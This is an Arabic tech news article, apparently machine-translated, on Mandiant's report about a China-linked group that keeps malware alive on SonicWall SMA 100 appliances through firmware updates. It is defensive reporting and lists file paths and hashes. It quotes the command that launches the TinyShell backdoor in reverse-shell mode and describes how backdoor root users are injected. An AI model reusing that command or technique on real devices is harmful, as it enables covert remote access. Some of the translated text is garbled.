قال باحثون إن جهات التهديد المرتبطة بالحكومة الصينية تصيب جهاز أمان مستخدمًا على نطاق واسع من SonicWall ببرامج ضارة تظل نشطة حتى بعد أن يتلقى الجهاز تحديثات البرامج الثابتة.
SonicWall’s Secure Mobile Access 100 هو جهاز آمن للوصول عن بعد يساعد المؤسسات على نشر القوى العاملة عن بعد بشكل آمن. يستخدمه العملاء لمنح عناصر تحكم وصول دقيقة للمستخدمين البعيدين ، وتوفير اتصالات VPN لشبكات المؤسسة ، وتعيين ملفات تعريف فريدة لكل موظف. إن وصول SMA 100 إلى شبكات العملاء يجعله هدفًا جذابًا للجهات الفاعلة في التهديد.
في عام 2021 ، تعرض الجهاز للهجوم من قبل متسللين متطورين استغلوا ما كان في ذلك الحين ثغرة يوم الصفر. تعرضت أجهزة الأمن من Fortinet و Pulse Secure لهجمات مماثلة في السنوات الأخيرة.
اكتساب ثبات طويل الأمد داخل الشبكات
يوم الخميس ، نشرت شركة الأمن Mandiant تقريرًا قال إن الجهات الفاعلة في التهديد التي يشتبه في ارتباطها بالصين تشارك في حملة للحفاظ على استمرارية طويلة الأمد من خلال تشغيل برامج ضارة على أجهزة SonicWall SMA غير المصححة. تميزت الحملة بقدرة البرامج الضارة على البقاء على الأجهزة حتى بعد أن تلقت البرامج الثابتة الخاصة بها برامج ثابتة جديدة.
كتب باحثو مانديانت دانيال لي وستيفن إيكلز وبن ريد: “بذل المهاجمون جهدًا كبيرًا في استقرار واستمرار أدواتهم”. “يسمح هذا لوصولهم إلى الشبكة بالاستمرار من خلال تحديثات البرامج الثابتة والحفاظ على موطئ قدم على الشبكة من خلال جهاز SonicWall.”
لتحقيق هذا الاستمرارية ، يتحقق البرنامج الضار من ترقيات البرامج الثابتة المتاحة كل 10 ثوانٍ. عندما يتوفر تحديث ، يقوم البرنامج الضار بنسخ الملف المؤرشف للنسخ الاحتياطي ، ويفك ضغطه ، ويثبته ، ثم ينسخ حزمة الملفات الضارة بالكامل إليه. تضيف البرامج الضارة أيضًا مستخدمًا جذريًا خلفيًا إلى الملف الذي تم تحميله. بعد ذلك ، تعيد البرامج الضارة ضغط الملف حتى يكون جاهزًا للتثبيت.
كتب الباحثون: “هذه التقنية ليست معقدة بشكل خاص ، لكنها تُظهر جهدًا كبيرًا من جانب المهاجم لفهم دورة تحديث الجهاز ، ثم تطوير واختبار طريقة للمثابرة”.
تتوافق تقنيات المثابرة مع حملة هجوم في عام 2021 استخدمت فيها 16 عائلة من البرامج الضارة لإصابة أجهزة Pulse Secure. أرجع مانديانت الهجمات إلى مجموعات تهديد متعددة ، بما في ذلك تلك التي تم تعقبها باسم UNC2630 ، UNC2717 ، والتي قالت الشركة إنها تدعم “الأولويات الرئيسية للحكومة الصينية”. أرجع مانديانت الهجمات المستمرة ضد عملاء SonicWall SMA 100 إلى مجموعة تم تتبعها باسم UNC4540.
“في السنوات الأخيرة ، نشر المهاجمون الصينيون العديد من عمليات الاستغلال والبرامج الضارة في يوم الصفر لمجموعة متنوعة من أجهزة الشبكة التي تواجه الإنترنت كطريق للتطفل الكامل على المؤسسة ، والمثال الذي تم الإبلاغ عنه هنا هو جزء من نمط حديث تتوقع Mandiant استمراره مع على المدى القريب ، كتب باحثو مانديانت في تقرير يوم الخميس.
وصول ذو امتيازات عالية
يبدو أن الغرض الرئيسي من البرنامج الضار هو سرقة كلمات المرور المشفرة لجميع المستخدمين الذين قاموا بتسجيل الدخول. كما يوفر أيضًا قشرة ويب يمكن أن يستخدمها ممثل التهديد لتثبيت برامج ضارة جديدة.
وكتب الباحثون في تقرير يوم الخميس: “كشف تحليل جهاز مخترق عن مجموعة من الملفات التي منحت المهاجم وصولاً ذا امتيازات عالية ومتاح إلى الجهاز”. تتكون البرامج الضارة من سلسلة من نصوص bash وثنائي ELF واحد تم تحديده على أنه متغير TinyShell. يُظهر السلوك العام لمجموعة نصوص bash الخبيثة فهماً مفصلاً للجهاز ومصمم جيدًا للنظام لتوفير الاستقرار والمثابرة “.
قائمة البرامج الضارة هي:
طريق | تجزئة | وظيفة |
/ بن / جدار الحماية | e4117b17e3d14fe64f45750be71dbaa6 | عملية البرمجيات الخبيثة الرئيسية |
/ بن / httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | TinyShell مستتر |
/etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | استمرار التمهيد لجدار الحماية د |
/ بن / iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | عملية البرامج الضارة الرئيسية الزائدة عن الحاجة |
/ bin / geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | البرنامج النصي مستتر البرامج الثابتة |
/ bin / ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | رشيقة البرنامج النصي الاغلاق |
وتابع التقرير:
نقطة إدخال البرامج الضارة الرئيسية هي نص برمجي bash مسمى
firewalld
الذي ينفذ الحلقة الأساسية مرة واحدة لعدد كل ملف على النظام التربيعي: …for j in $(ls / -R) do for i in $(ls / -R) do:
… البرنامج النصي مسؤول عن تنفيذ أمر SQL لإنجاز سرقة بيانات الاعتماد وتنفيذ المكونات الأخرى.الوظيفة الأولى في
firewalld
ينفذ الباب الخلفي TinyShellhttpsd
بأمرnohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &
إذا كانhttpsd
العملية لا تعمل بالفعل. يؤدي هذا إلى تعيين TinyShell إلى وضع shell العكسي ، وإرشادها إلى الاتصال بعنوان IP والمنفذ المذكورين أعلاه في وقت ويوم محددين يمثلهما-m
العلم ، مع فاصل منارة محدد بواسطة-d
علَم. يقوم الثنائي بتضمين عنوان IP مشفر الثابت ، والذي يتم استخدامه في وضع الغلاف العكسي إذا تم ترك وسيطة عنوان IP فارغة. كما أن لديها وضع صدفة استماع متاح.
قال الباحثون إنهم لا يعرفون ما هو ناقل العدوى الأولي.
في الأسبوع الماضي ، نشرت SonicWall نصيحة حثت مستخدمي SMA 100 على الترقية إلى الإصدار 10.2.1.7 أو أعلى. تتضمن هذه الإصدارات تحسينات مثل مراقبة تكامل الملفات وتحديد العمليات الشاذة. التصحيح متاح هنا. يجب على المستخدمين أيضًا مراجعة السجلات بانتظام بحثًا عن علامات الاختراق ، بما في ذلك عمليات تسجيل الدخول غير الطبيعية أو حركة المرور الداخلية.
اكتشاف المزيد من عرب نيوز للتقنية
اشترك للحصول على أحدث التدوينات المرسلة إلى بريدك الإلكتروني.